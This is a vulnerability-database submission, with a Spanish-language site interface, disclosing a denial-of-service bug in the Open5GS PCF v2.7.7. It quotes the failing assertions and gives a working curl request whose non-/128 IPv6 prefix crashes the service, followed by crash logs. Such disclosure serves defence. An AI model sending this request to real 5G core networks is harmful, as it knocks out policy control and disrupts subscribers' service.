Enviar #808443: Open5gs PCF v2.7.7 Denial of Serviceinformación

TítuloOpen5gs PCF v2.7.7 Denial of Service
Descripción### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description PCF crashes when `SmPolicyContextData.ipv6AddressPrefix` is syntactically valid but not `/128`. The handler asserts that `pcf_sess_set_ipv6prefix()` succeeds: ```c ogs_assert(true == pcf_sess_set_ipv6prefix(sess, SmPolicyContextData->ipv6_address_prefix)); ``` Inside `pcf_sess_set_ipv6prefix()`, the parsed prefix length is required to be exactly `OGS_IPV6_128_PREFIX_LEN`: ```c ogs_assert(sess->ipv6prefix.len == OGS_IPV6_128_PREFIX_LEN); ``` So a valid prefix such as `2001:db8::1/64` becomes a process-killing assert. ### Steps to reproduce ```bash IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' pcf) curl --http2-prior-knowledge -m 5 -sS -i \ -X POST "http://$IP/npcf-smpolicycontrol/v1/sm-policies" \ -H 'content-type: application/json' \ --data '{"supi":"imsi-001010000000002","pduSessionId":2,"pduSessionType":"IPV6","dnn":"internet","notificationUri":"http://127.0.0.1:9999/cb","ipv6AddressPrefix":"2001:db8::1/64","sliceInfo":{"sst":1,"sd":"000001"}}' ``` Then check: ```bash docker logs --since 2026-04-10T18:37:20Z pcf docker inspect -f '{{.RestartCount}} {{.State.StartedAt}}' pcf ``` ### Logs ```shell curl: (56) Recv failure: Connection reset by peer 04/10 18:37:20.063: [pcf] FATAL: pcf_sess_set_ipv6prefix: Assertion `sess->ipv6prefix.len == OGS_IPV6_128_PREFIX_LEN' failed. (../src/pcf/context.c:675) The container restarted automatically after the crash. ``` ### Expected behaviour PCF should reject non-`/128` prefixes with a normal HTTP error response. ### Observed Behaviour The connection is reset and the PCF process aborts on the prefix-length assertion. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Fuente⚠️ https://github.com/open5gs/open5gs/issues/4439
Usuario
 LinZiyu (UID 94035)
Sumisión2026-04-20 20:37 (hace 1 mes)
Moderación2026-05-09 09:35 (19 days later)
EstadoAceptado
Entrada de VulDB362441 [Open5GS hasta 2.7.7 PCF /src/pcf/context.c pcf_sess_set_ipv6prefix SmPolicyContextData.ipv6AddressPrefix denegación de servicio]
Puntos20

AnteriorVisión De ConjuntoPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!